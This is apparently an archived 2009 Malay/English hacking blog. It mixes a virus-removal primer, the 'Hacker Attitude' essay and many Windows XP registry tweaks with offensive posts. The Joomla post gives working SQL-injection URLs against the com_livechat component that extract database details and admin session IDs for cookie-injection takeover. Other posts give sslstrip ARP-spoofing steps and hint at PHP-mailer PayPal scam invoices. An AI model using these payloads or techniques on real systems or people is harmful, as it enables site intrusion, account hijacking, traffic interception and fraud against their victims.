1st skali korang kena faham konsep virus / trojan dan cara2 dia bekerja dlm windows / rangkaian.. dan korang bleh remove virus tersebut secara manual dahulu termasuk lah dlm task windows, registry dan sebagainya.. kalau yg ni tak lepas.. jgn mimpi nk langkah kedepan.. hands on utk nie.. korang dah pernah develop mana2 virus / worm / trojan..

ok.. kebiasaannye utk mana2 application untuk windows.. akan ada PE header sbg address.. so PE header ini lah yang akan di ambil dari mana2 virus / trojan / worm tadi dan diletak dlm dbase sebagai rujukan mana2 antivirus untuk mengenalinya..

ermm.. untuk nk develop anti virus atau virus removel nie.. langguage yang korang nk guna bergantung le pada skill tahap deva korang yg melibatkan resource bnyk dlm windows..
- module spy utk windows
- registry
- task list
- file / archive
- kill process
- connectivity / port etc
- dan lain2 yg berkaitan la ye

utk newbies yg nk develop removel nie aku cadangkan korang gunakan VB6..

Virus Dropper - Versi HTML

2009-05-04T22:43:00.000-07:00

sslstrip - https stripping attacks

2009-05-04T22:37:00.000-07:00

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
To get this running:

Flip your machine into forwarding mode.
Setup iptables to redirect HTTP traffic to sslstrip.
Run sslstrip.
Run arpspoof to convince a network they should send their traffic to you.
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router's MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

Changes in 0.2 (02/25/09)

Fixed the listen port command-line option to actually work.
Changes in 0.1 (02/21/09)
Initial stripped-down public release.

http://www.thoughtcrime.org/software/sslstrip/
http://securitytube.net/SSLstrip-Tutorial-video.aspx

Teknik scam di Ebay? Latest Scam di Paypal?

2009-05-04T22:35:00.001-07:00

Ini antara teknik penipuan yag sedang hangat dipasaran. Mereka mencari mangsa di craiglist dan ebay. Memberitahu ingin membeli barangan anda dan meminta menghantar invoice ke alamat paypal mereka. dengan menggunakan SMPT to inbox ( PHP mailer), anda boleh membina sesuatu yang lebih menyakinkan.

Ada banyak lagi yang kita boleh buat dgn PHP mailer. Orang nigeria mmg kreatif. Sebab tu mereka berada dalam TOP list tetapi mereka masih lagi untung dgn penipuan Internet.

Dalam tutorial seterusnya saya akan ceritakan beberapa teknik yang digunakan oleh penipu di Internet utk menjana wang Haram menggunakan travellers cheque

Myspace Picture Viewer

2009-05-04T22:30:00.000-07:00

2 Method

* Gunakan url ni
http://lads.myspace.com/slides/photoslider.swf?u=masukkan id
gantikan u= dengan id orang yang kita nak view picture dia tu

*ko try nie..
http://www.viewmyspacephoto.com/

Macam mana nak crack/hack joomla md5+salt

2009-05-04T22:28:00.000-07:00

Hmm.. banyak exploit code pasal joomla component yang selalu dipublishkan kat milw0rm. Tapi problemnya, bila kita nak crack hash yang kita dapat, payah.. sebab dia ada salt.

Tadi aku ada nengok sikit code authentication joomla ni, rasanya macam paham la sikit2.. insya ALLAH ada masa nanti aku bincangkan kat sini. (letih dah ni.. nak tidor)

Aku ada buat sikit test, tujuan kita/hackers nak hack website ni ada dua.

1. nak deface

2. sekadar poc/nak view maklumat yang mungkin sensitif

Secara peribadi, aku ni jenis yang no 2 kot

So kat sini aku bagi sikit tips dan trick. (Aku memang minat SQL injection, so aku manipulate sikit exploit com_livechat tu)

Macam biasa, mula-mula dapat version number dulu

http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,@@version,3

Pastu dapatkan username system/database. Untuk password tu pandai-pandai la yer. Bila dah dapat, try scan target. Kalau port mysql dibuka, why not connect dengan target mysql tu menggunakan credentials yang kita dapat?

http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,user(),3

NI pulak untuk dapatkan nama database. Benda ni amat berguna untuk step step yang lebih advance

http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,database(),3

Cuba carik table lain selain dari table joomla tersebut. Mungkin ada table lain yang menyimpan data yang lebih menarik . NI codenya

http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*

Dan part yang paling best. Korang pernah tak kaji table jos_session dalam joomla? Huhuhu.. Cuba studi sikit pasal table jos_session tu.. ada rahsia besar disebalik table tu.. huhuh.. cuba dapatkan session ketika admin login dalam page, pastu buat cookie injection. Mana tahu bila kita refresh page kita leh dapat masuk admin page? Huhuh. Ni code dia

http://xxx.xxx.xxx.xxx/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1+union+select+1,unhex(hex(concat(username,0x3a,session_id))),3+from+jos_session

Kita kena fikir lebih luas dan lebih dalam. Aku lebih suka explore dari deface.. mungkin macam kata bro ak47suk1 la.. maybe i am a white hat

Nanti ada masa kita bincangkan algoritma yang digunakan oleh joomla untuk tujuan hashing. Bila dah faham algo dia, mungkin mudah sikit untuk kita buat tools/script untuk brute force

What Is a Hacker?

2009-05-04T20:24:00.000-07:00

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant. There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have cont What Is a Hacker?

Hacker Attitude

2009-05-04T20:22:00.000-07:00

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:
To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

Tip & Trick

2009-05-04T20:12:00.000-07:00

Create a Password Reset Disk

If you’re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk:

Click Start, click Control Panel, and then click User Accounts.
Click your account name.
Under Related Tasks, click Prevent a forgotten password.

Follow the directions in the Forgotten Password Wizard to create a password reset disk.

Store the disk in a secure location, because anyone using it can access your local user account

How do I get the "Administrator" name on Welcome Screen?

To get Admin account on the "Welcome Screen" as well as the other usernames, make sure that there are no accounts logged in.

Press "ctrl-alt-del" twice and you should be able to login as administrator!

finally worked for me after i found out that all accounts have to be logged out first

Hack Your Start Button

I've gotten so many requests on how to change the Windows XP Start button, I'm going to teach you how to hack it to pieces manually.
Before you get started, you might want to print out this page for easy reference.

Change the Start text

1. First of all, make sure you download Resource Hacker. You'll need this puppy to edit resources inside your Windows shell.

2. Locate explorer.exe in your c:\Windows directory. Make a copy of the file in the same directory and rename it explorer.bak.

3. Now launch Resource Hacker. In the File menu, open explorer.exe. You'll now see a bunch of collapsed folders.

4. Expand the String Table folder and then find folder No. 37 (folder No. 38 if you're in Windows Classic mode).

5. Click on resource 1033 and locate the text that says "Start." This is your Start button, and now you've got control over what it says! Change the "Start" text to your text of choice. You don't have a character limit, but the text takes up valuable taskbar space, so don't make it too long.

6. Click on the button labeled Compile Script. This updates the settings for your Start button. But nothing will happen until you complete through step #20, so keep going!

Change your hover text

7. While you're here, why not also change the text that pops up when your mouse hovers over your Start button?

8. Right now it says "Click here to begin." Well, duh! We already know that's where to begin!

9. Open folder No. 34 and click on resource 1033.

10. Find the text that says "Click here to begin" and change it to something cooler. Might I suggest "Click here for a good time, baby."

11. Click on the Compile Script button to update this resource.

Customize your Start icon

12. For an added bonus, you can also change the Windows icon to the left of the text, too.

13. Collapse the String Table folder and expand the Bitmap folder at the top of your folder list.

14. Click on folder No. 143 and click on resource 1033. You should see that familiar Windows icon.

15. Go to the Action Menu and select "Replace bitmap." Select "Open file with new bitmap", and locate the replacement image on your machine. Note: The image must have a .bmp extension and a size of 25 pixels by 20 pixels. Then click the Replace button.

Here's the image I've been using instead of the Windows icon, in case you want to use it.

16. Now that you've made your changes, save the file in your Windows folder with another name, such as newstartbutton.exe. Don't name it Explorer.exe, because that file is already being used by your system. Close all open programs and restart your system.

17. Boot into Safe Mode With Command Prompt by pressing F8 on startup. Then choose Safe Mode in the command prompt.

18. Log on as administrator and enter your password.

19. When the command prompt comes up, make sure you're in the right directory by typing "cd c:\windows" (without the quotes).

20. Now type "copy c:\windows\newstartbutton.exe c:\windows\explorer.exe" (no quotes). Type "yes" (no quotes) to overwrite the existing file, then restart your system by typing "shutdown -r" (no quotes).

When Windows relaunches, you'll see your new Start button in all its glory!

Speed Up Your, Speed Up Your Network and Internet Access

I have a dial up connection and it improve my speeds about 25% in surfing the internet. give it a try. Im IT , only do it if you feel comfortable with changing registry.

Increasing network browsing speed

Does your computer slow down when you browse your local area network and connect to other computers that are sharing data? One of the most common causes of this slowdown is a feature of Windows Explorer that looks for scheduled tasks on remote computers. This effort can take some time on some computers and can really slow down your browsing. The window with which you are browsing the network may appear to freeze momentarily, as the system is waiting for a response from the remote computer.

Windows XP: Speeding Disk Access

Although this problem is a complex one, the solution is very simple. Instead of having to wait for the remote scheduled tasks, which is useless information to anyone who is not a system administrator remotely configuring scheduled tasks, you can disable this feature.

In order to do this, you will have to change the System Registry and delete a reference to a key so that this feature will not be loaded. To do this, follow these steps:

1. Open up the Registry Editor by clicking the Start Menu and selecting Run. Then type regedit in the text box and click the OK button.

2. Once the Registry Editor has loaded, expand the HKEY_LOCAL_MACHINE key.

3. Next, expand Software and then Microsoft.

4. Locate Windows and expand that as well.

5. You will want to be editing the main system files, so expand CurrentVersion.

6. Because this feature is a feature of the Windows component known as Explorer, expand the Explorer key.

7. Next, you will want to modify the remote computer settings, so expand the RemoteComputer key and then expand the NameSpace key to show all of the features that are enabled when you browse to a remote computer.

8. In the NameSpace folder you will find two entries. One is "{2227A280-3AEA-1069-A2DE-08002B30309D}" which tells Explorer to show printers shared on the remote machine. The other, "{D6277990-4C6A-11CF-8D87-00AA0060F5BF}," tells Explorer to show remote scheduled tasks. This is the one that you should delete. This can be done by right-clicking the name of the key and selecting Delete.

Tip:
If you have no use for viewing remote shared printers and are really only interested in shared files, consider deleting the printers key, "{2227A280-3AEA-1069-A2DE-08002B30309D}", as well. This will also boost your browsing speed.

Once you have deleted the key, you just need to restart and the changes will be in effect. Now your network computer browsing will be without needless delays.

WINDOWS XP HIDDEN APPS

WINDOWS XP HIDDEN APPS

To run any of these apps go to Start > Run and type the executable name (ie charmap).

WINDOWS XP HIDDEN APPS:
=========================================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions

Hacking Windows XP Registry

Structure of Windows XP Registry :

When you will open the Windows XP Registry , you will see it's divided into two panes. On the left side there are Five main
Keys as shown below. These can be expanded to several Sub-Keys, which further has many Sub-Keys.

+HKEY_CLASSES_ROOT

+HKEY_CURRENT_USER

+HKEY_LOCAL_MACHINE

+HKEY_USERS

+HKEY_CURRENT_CONFIG

Before you try out the Tweaks, learn how to Backup and Restore Windows XP Registry.
Types of Registry Backups :
It?s very important that before you do editing you make a backup of the current registry. If you ignore this warning, it might prove deadly for you?so better listen to me J
Open your registry. Go to Start>Run , type regedit . When you invoke the Export function from File>Export, you are given a choice of different file types that can be saved :
Registration Files (*.reg)
Registry Hive Files (*.*)
Text Files (*.txt)
Win9x/NT 4 Registration Files (*.reg)
All Files

Each one of the different file types above plays an important role in how the data you export is saved. Choosing the wrong type can give you unexpected results. So let me explain you quickly these file types.

Registrations Files : The Registration Files option creates a .reg file. This is the most well known file format used for backing up the registry. The Registration File can be used in two ways. As a text file it can be read and edited using Notepad outside of Registry Editor. Once the changes have been made and saved, right clicking the file and using the [Merge] command adds the changed file back into the registry. If you make additions to the registry using regedit and then merge the previously saved Registration File, anything that you've added via regedit will not be removed, but changes you make to data using regedit that previously existed in the saved Registration File will be overwritten when it is merged

Registry Hive Files : Unlike the Registration Files option above, the Registry Hive Files option creates a binary image of the selected registry key. The image file is not editable via Notepad nor can you view its contents using a text editor. However, what the Registry Hive Files format does is create an image perfect view of the selected key and allow you to import it back into the registry to insure any problematic changes you made are eliminated.

Text Files : This option does just as the name suggests. It creates a text file containing the information in the selected key. It's most useful purpose is creating a record or snapshot of a key at a particular point in time that you can refer back to if necessary. It cannot be merged back into the registry like a Registration File.

Win9x/NT 4 Registration Files : This option creates a .reg file in the same manner used by the Registration Files option. It's used by previous Windows versions and serves no purpose in XP unless you want to merge a key from XP into a previous version of Windows.

Out of the give above choices , the safest method of backing up registry is to use Registry Hive Files option. No matter what ever you do or goes wrong in editing, importing the image of the key will eliminate all changes.

**Note-> I have included the exact name/value between [ ] brackets. [ & ] should be ignored, only the data inside them should be considered.

1. Customize Windows Media Player Title Bar

Change the title bar to read Windows Media Player provided by , so if I had entered text ?Abhishek Bhuyan? , it would read: Windows Media Player provided by Abhishek Bhuyan

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Policies\Microsoft
Create the Key [WindowsMediaPlayer]
Create String value named [TitleBar]

Data Type: REG_SZ // Value Name: TitleBar
Double click TitleBar and Enter the text to be displayed in the title bar.

Exit Registry / Reboot

2. Minimize Outlook 2002 to the System Tray

If you frequently access Outlook during the day it?s more convenient to have it minimized to the system tray rather than invoking it each time you need to send/receive e-mail. This tweak minimizes Outlook 2002 to the system tray:

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Preferences

Modify/Create Data Type DWORD named [MinToTray]
Setting for Value Data: [0 = Disabled / 1 = Enabled]

Exit Registry / Reboot

3. Specify Default IE Download Directory

This tweak changes the default directory where downloads initiated in Internet Explorer are stored on the system.

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer

Modify/Create String Value of Data type REG_SZ Named [Download Directory]
Value Data: [Enter Path to Directory to be Assigned as Defualt for Downloads]

Exit Registry / Reboot

4. Force Use of Classic Start Menu

This tweak loads the Classic Start Menu and makes it impossible to change back to the Windows XP version

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Modify/Create the DWORD Value of Data type REG_DWORD Named [NoSimpleStartMenu]
Value Data: [0 = Default / 1 = Force Classic Start Menu]

Exit Registry / Reboot

5. Hide/Show Internet Explorer Desktop Icon

By default, Windows XP does not show the Internet Explorer icon on the Windows desktop. Using the registry tweak below allows you to control whether or not the Internet Explorer icon is displayed.

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Modify/Create DWORD Value of Data type REG_DWORD Named [NoInternetIcon]
Setting for Value Data: [0 = Disabled / 1 = Enabled]

Exit Registry / Reboot

6. Increase Menu Display Speed

When you click on the Start Menu there is some delay to display the contents , just for no reason. Effects are pretty though. The default speed can be adjusted with a quick registry entry.

The default value is 400. Set it to 0 and the delay is gone. If you are not able to adjust pick a number that suits your style and make the change.

[Start] [Run] [Regedit]

Go to HKEY_CURRENT_USER\Control Panel\Desktop

Modify/Create String value of Data type REG_SZ Named [MenuShowDelay]

Value Data: [Default = 400 / Adjust to Preference]

Exit Registry / Reboot

7. Change the Location of Special Folders

This tweak allows changing the location of special folders on the system. Any of the folders listed in the registry key may be moved.

[Start] [Run] [Regedit]

Go to : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders

Modify/Create String value of Data type REG_SZ Named [Various Folder Names]

Data Type: REG_SZ [String Value] // Value Name: Consult RegEdit for Folder Names

Value Data: [Move the folder to the new desired location using explorer, and then edit the matching folder in RegEdit to reflect the new folder location]

Exit Registry and Reboot

8. Faster Browsing in Windows Explorer on Network Computers

By default, a Windows XP machine connecting to a Windows 95/98/Me computer will search for scheduled tasks or enabled printers on the remote computer. Two sub-keys control this behavior. Deleting them will speed up browsing on the remote computer.

[Start] [Run] [Regedit]

Go to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace

To Disable Scheduled Task Checking
Value Name: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Delete the sub-key in the left pane of Registry Editor

To Disable Printer Checking
Value Name: {2227A280-3AEA-1069-A2DE-08002B30309D}
Delete the sub-key in the left pane of Registry Editor

Exit Registry / Reboot

9. Add Administrator Account to Log In Screen

When Windows XP is first installed it requires you to enter at least one name of a user who will access the computer. Once you create this name the default Administrator account vanishes. To access it, press Ctrl-Alt-Delete twice at the Welcome screen to retrieve the standard Windows 2000 logon dialog. Log on as Administrator from this point. To log the Administrator off, click [Start] [Log Off] and [Log Off] when the [Log Off Windows] selection box appears. The Log On screen with the available users will be displayed.

To Make the Administrator Account Always Visible on the Login Screen use this Registry Tweak.

[Start] [Run] [Regedit]

Go to: HKEY_LOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Modify/Create DWORD Value of Data type REG_DWORD Named [Administrator]
Setting for Value Data: [0 = Disabled / 1 = Enabled]

Exit Registry / Reboot

10. Increase Internet Download Connections

Increase Simultaneous Internet Download Connections. Increases the number of allowed simultaneous connections to ten (10).

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

Modify/Create DWORD Value of Data type REG_DWORD Named [MaxConnectionsPer1_0Server]
Setting for Value Data: [0000000a]

Modify/Create DWORD Value of Data type REG_DWORD Named [MaxConnectionsPerServer]
Setting for Value Data: [0000000a]

Exit Registry / Reboot

11. Connected Web Files and Folders

Connecting web files and folders allows a primary .htm or .html file to be moved in conjunction with files associated with the primary document. Once the primary document has been defined, create a sub-folder using the same name as the primary document but assign it a .files extension. Whenever the primary file is moved, the sub-folder will also move and remain as a sub-folder of the primary.

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Modify/Create DWORD Value of Data type REG_DWORD Named [NoFileFolderConnection]
Setting for Value Data: [0 = Enabled (Default) / 1 = Disabled]

Exit Registry / Reboot

12. Hide/Show My Documents Folder on Desktop

By default, Windows XP does not show the My Documents folder on the Windows desktop. Using the registry tweak below allows you to control whether or not My Documents is displayed.

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder

Modify/Create DWORD Value of Data type REG_DWORD Named [Attributes]
Setting for Value Data: [Default = 0xf0400174 / Hidden = 0xf0500174]

Exit Registry / Reboot

13. Create a Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000 i.e. press CTRL+ALT+DEL twice.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Modify/Create DWORD Value of Data type REG_DWORD Named [Type Name of Account to be Hidden]
Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

Exit Registry / Reboot

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups.

14. Create Legal Notice Logon Dialog Box

In situations where you need users to read a legal notice before logging on, this tweak will create the caption for the notice.

Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Modify/Create String Value of Data type REG_SZ Named [LegalNoticeCaption]
Value Data for LegalNoticeCaption: [Type the Caption for the Dialog Box]

Modify/Create String Value of Data type REG_SZ Named [LegalNoticeText]
Value Data for LegalNoticeText: [Type the Data for the Legal Notice]

Exit Registry / Reboot

15. Manage Internet Explorer Error Reporting

This tweak removes the IE Error Reporting tool from appearing with the option to send browser debugging reports to Microsoft.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main

Note:- Create both values listed below and set according to the bold type for the tweak to function properly.

Modify/Create DWORD Value of Data type REG_DWORD Named [IEWatsonEnabled]
Value Data: [0 - Disabled / 1 - Enabled]

Modify/Create DWORD Value of Data type REG_DWORD Named [IEWatsonDisabled]
Value Data: [0 - Disabled / 1 - Enabled]

Exit Registry / Reboot

16. Customize Logon and Security Dialog Title

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon

Modify/Create String Value of Data type REG_SZ Named [Welcome]
Value Data: [0 = Disabled / 1 = Enabled]

Exit Registry / Reboot

17. Customize Logon Box Message

This is the message displayed on the Classic Logon box, not the XP ?Welcome? logon screen

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon

Modify/Create String Value of Data type REG_SZ Named [LogonPrompt]
Value Data: [Enter the text of the message]

Exit Registry / Reboot

18. Welcome Screen Logon Vs Classic Logon

This tweak specifies whether the Welcome screen or the Classic logon will be used to access Windows XP.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Modify/Create DWORD Value of Data type REG_DWORD Named [LogonType]
Value Data: [0 - Classic Mode / 1 - Welcome Screen]

Exit Registry / Reboot

19. QoS (Quality Of Service) Bandwidth Reserve Setting

By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic. This tweak allows the setting to be altered to a different percentage of connection bandwidth. If the system uses more than a single adapter for network connections, each adapter may be set individually by navigating to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Psched\Parameters\Adapters\{Adpater-ID} rather than HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Psched

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Psched

Modify/Create DWORD Value of Data type REG_DWORD Named [NonBestEffortLimit]
Setting for Value Data: [Enter as a Percentage / Default Value = 20]

Exit Registry / Reboot

20. Enable/Disable Save Password in DUN

This tweak saves user passwords for Dial Up Networking so they do not have to be re-entered each session.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters

Modify/Create DWORD Value of Data type REG_DWORD Named [DisableSavePassword]
Setting for Value Data: [0 = Disabled (Passwords Saved) / 1 = Enabled (Passwords Not Saved)]

Exit Registry / Reboot

21. Change the Registered Organization/Owner of Windows XP

This tweak allows modification of the registered owner and organization of the Windows XP software.

Note:- This tweak has nothing to do with Windows Product Activation (WPA) and will not allow you to register illegal XP software.

[Start] [Run] [Regedit]

Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Modify/Create String Value of Data type REG_SZ Named [RegisteredOrganization] or [RegisteredOwner]
Setting for Value Data: [Modify the Values to Reflect Current Information]

Exit Registry / Reboot

22. Remove Links Folder in Favorites

The Links folder is part of Favorites whether it's being accessed through Internet Explorer or the Favorites menu in the Start Menu. This tweak will remove it from those locations.

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar

Modify/Create String Value of Data type REG_SZ Named [LinksFolderName]
Value Data: [Set the String Value to a blank string]

Open Internet Explorer and manually delete the Links folder from Favorites Menu.
The Links folder will not be recreated.

Exit Registry / Reboot

23. Enable/Disable Active Window Tracking to Mouse Movements

When the mouse is moved over an open window it automatically sets the focus to that particular window. It does not bring the window to the foreground of the open windows.

[Start] [Run] [Regedit]

Go to: HKEY_CURRENT_USER\Control Panel\Mouse

Modify/Create DWORD Value of Data type REG_DWORD Named [ActiveWindowTracking]
Setting for Value Data: [0 = ActiveWindowTracking Disabled / 1 = ActiveWindowTracking Enabled]

Exit Registry / Reboot

24. Auto Disconnect for Internet Explorer

Use this edit to automatically disconnect from Internet Explorer after a specified length of time has elapsed. Use this trick on anyone whom you don?t like using your computer with net J

[Start] [Run] [Regedit]

